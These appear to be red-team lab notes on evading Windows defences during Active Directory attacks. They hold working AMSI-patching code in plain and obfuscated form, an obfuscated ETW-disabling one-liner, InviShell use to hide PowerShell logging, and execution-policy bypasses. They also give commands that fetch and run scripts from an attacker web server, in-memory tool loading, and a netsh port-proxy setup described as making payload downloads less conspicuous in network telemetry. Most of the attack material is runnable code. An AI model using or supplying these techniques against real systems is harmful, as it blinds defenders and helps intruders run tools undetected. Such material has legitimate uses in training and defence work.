🛡️ Bypass defenses
⚠️ Execution policy is not a security boundary: the options below only control whether the current process will run scripts, and none of them defeats AV, AMSI or logging.
# Change the policy for this process only (no admin rights, nothing persisted)
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
# Run a command directly without spawning a full session
powershell -c <command>
# Run a base64 (UTF-16LE) encoded command
powershell -encodedcommand <base64>
# Bypass execution policy using environment variable
$env:PSExecutionPolicyPreference="bypass"
InviShell
InviShell hides PowerShell activity from Script Block Logging, Module Logging and Transcription by loading a CLR profiler DLL into the PowerShell process (via the COR_ENABLE_PROFILING/COR_PROFILER environment variables) and hooking the .NET methods that perform the logging. The admin variant registers the profiler system-wide; the non-admin variant registers it under the current user's registry hive, so no elevation is needed. It only affects PowerShell's own logging inside the spawned session, not what an EDR captures from other sources.
# Run as Administrator
C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat
# Run without Admin privileges
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
# import powerview
. C:\AD\Tools\PowerView.ps1
AMSI bypass
What is AMSI?
The Antimalware Scan Interface (AMSI) is a Windows API through which script hosts (PowerShell, VBScript/JScript under WSH, Office macros, .NET Assembly.Load) hand the content they are about to execute to the registered AV (Defender by default) for scanning in memory, just before it runs. Because the scan happens on the decoded, in-memory content, obfuscation on disk and fileless loading do not help by themselves. Defender signatures PowerView and similar tools, so AMSI has to be patched in the current process before loading them. The patch is per process: a new PowerShell window starts with AMSI active again.
# Split the strings so the literals "AmsiUtils" and "amsiInitFailed" never appear in the script text
$a = 'System.Management.Automation.A'; $b = 'msi'; $c = 'Utils'
$ref = [Ref].Assembly.GetType(($a+$b+$c))
# Setting the private static amsiInitFailed flag makes PowerShell skip AMSI scanning for this process
$ref.GetField(('amsi'+'Init'+'Failed'),'NonPublic,Static').SetValue($null,$true)
Obfuscated version (harder to detect: Defender has signatures for the well-known form above, including common string-concatenation variants, so the plain version is often blocked on patched hosts)
S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Alternatively, base64-encode the bypass (UTF-16LE) and decode it at run time so the plain text never appears on the command line. Note that the decoded script block is still passed to AMSI when it is created, so the encoded content must be the obfuscated form, not the plain one:
Invoke-Command ([scriptblock]::Create([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('<base64>'))))
Or put the bypass in a text file on your web server and pull it over HTTP:
iex (iwr -UseBasicParsing http://172.16.100.x/amsibypass.txt)
ETW bypass
What is ETW?
Event Tracing for Windows (ETW) is the kernel-supported tracing facility that providers in the kernel and in user-mode applications write events to. PowerShell has its own provider (PSEtwLogProvider), and Script Block Logging (event 4104) and the other PowerShell events reach the event log, and any EDR listening to the trace, through it. It must be bypas
The one-liner below zeroes the m_enabled field of that provider's underlying EventProvider, so this PowerShell process stops emitting ETW events (including the 4104 script block logs) until it exits. Like the AMSI patch it is per process.
[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)
From file
iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)
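A way to confirm that the ETW bypass, or an InviShell session from the section above, actually stopped PowerShell's logging, checked from both sides. This is an added example and not part of the original notes. Get-PSEtwProviderEnabled is a read-only walk of the same reflection chain the one-liner above writes to; Test-ScriptBlockLogged runs a marked script block and looks for it among the 4104 events a defender would collect. It assumes Windows PowerShell 5.1 (the .NET Framework types the bypass targets), that Script Block Logging is enabled on the host (otherwise no 4104 events are written regardless of the bypass) and that the Microsoft-Windows-PowerShell/Operational log is readable by the current user; the function names are mine.

```powershell
# Added example: verify PowerShell's ETW logging state before/after the bypass.

function Get-PSEtwProviderEnabled {
    # Read-only version of the reflection chain in the bypass one-liner:
    # PSEtwLogProvider.etwProvider is a System.Diagnostics.Eventing.EventProvider
    # whose private m_enabled field is non-zero while a trace session is listening.
    $psEtw    = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
    $provider = $psEtw.GetField('etwProvider', 'NonPublic,Static').GetValue($null)
    $core     = [Reflection.Assembly]::LoadWithPartialName('System.Core')
    $epType   = $core.GetType('System.Diagnostics.Eventing.EventProvider')
    $field    = $epType.GetField('m_enabled', 'NonPublic,Instance')
    return [int]$field.GetValue($provider)   # 0 = this process emits no ETW events
}

function Test-ScriptBlockLogged {
    # Run a script block carrying a unique marker, then look for that marker in
    # the PowerShell Operational log (event 4104 = script block logging).
    $marker = 'sbl-probe-' + [guid]::NewGuid().ToString('N')
    Invoke-Expression "Write-Output '$marker' | Out-Null"
    Start-Sleep -Seconds 2   # the event is written asynchronously
    $hit = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddMinutes(-1)
    } -ErrorAction SilentlyContinue | Where-Object { $_.Message -like "*$marker*" }
    return [bool]$hit
}

"ETW provider enabled (non-zero = logging): $(Get-PSEtwProviderEnabled)"
"Probe script block reached event 4104:    $(Test-ScriptBlockLogged)"
```

Run it once in a clean session, then again after the bypass (or inside the InviShell session): the provider value should drop to 0 and the probe should no longer reach the log. Events written before the bypass stay in the log, so a defender reviewing 4104 history will still see everything up to the point the patch was applied, including the patch itself unless it was obfuscated. The plain type and field names in Get-PSEtwProviderEnabled may themselves be flagged by Defender, in which case read them through the same string splitting the one-liner uses.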
Load PowerView remotely (after the AMSI bypass, otherwise the download is scanned and blocked when it is executed)
$url = "http://172.16.100.44/PowerView.ps1"
iex (New-Object Net.WebClient).DownloadString($url)
Loader
Loads and executes binaries in memory so the tool never touches disk, where Defender would scan it. Supports both local and remote paths. In-memory loading avoids on-disk detection but not in-memory scanning (AMSI also hooks .NET assembly loads), so run it after the AMSI bypass above.
# Load from local path
C:\AD\Tools\Loader.exe -path C:\AD\Tools\<tool>.exe -args "<arguments>"
# Load remotely via port proxy
C:\AD\Tools\Loader.exe -path http://127.0.0.1:8080/<tool>.exe -args "<arguments>"
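The port-proxy setup the remote Loader command above relies on, as an added example that is not the original notes' code: a netsh portproxy rule on the target so that 127.0.0.1:8080 forwards to your web server, with a check that the listener is up and the cleanup afterwards. The attacker address and port (172.16.100.x on 80) and the <tool>/<arguments> placeholders are assumptions to adjust for your environment; netsh portproxy needs an elevated prompt and the IP Helper service running.

```powershell
# Added example: loopback port proxy so Loader.exe can fetch a tool from
# http://127.0.0.1:8080 while the bytes really come from the attacker's web server.
$attackerIp   = '172.16.100.x'   # placeholder: your HTTP server
$attackerPort = 80               # placeholder: port the server listens on
$localPort    = 8080             # what the remote Loader command above points at

# Bind to loopback only so the proxy is not reachable from other hosts.
netsh interface portproxy add v4tov4 "listenport=$localPort" listenaddress=127.0.0.1 "connectport=$attackerPort" "connectaddress=$attackerIp"

# Confirm the rule exists and something is actually listening before using it.
netsh interface portproxy show v4tov4
(Test-NetConnection -ComputerName 127.0.0.1 -Port $localPort).TcpTestSucceeded

# Same syntax as the remote Loader command above; <tool> and <arguments> are placeholders.
$toolUrl = "http://127.0.0.1:$localPort/<tool>.exe"
C:\AD\Tools\Loader.exe -path $toolUrl -args "<arguments>"

# Remove the rule when finished so it is not left behind on the target.
netsh interface portproxy delete v4tov4 "listenport=$localPort" listenaddress=127.0.0.1
```

The reason for the detour through loopback is that the download then originates from 127.0.0.1 rather than from an external address, which is less conspicuous in host-based network telemetry; the portproxy rule itself is persistent and visible with netsh interface portproxy show all, so the delete step matters.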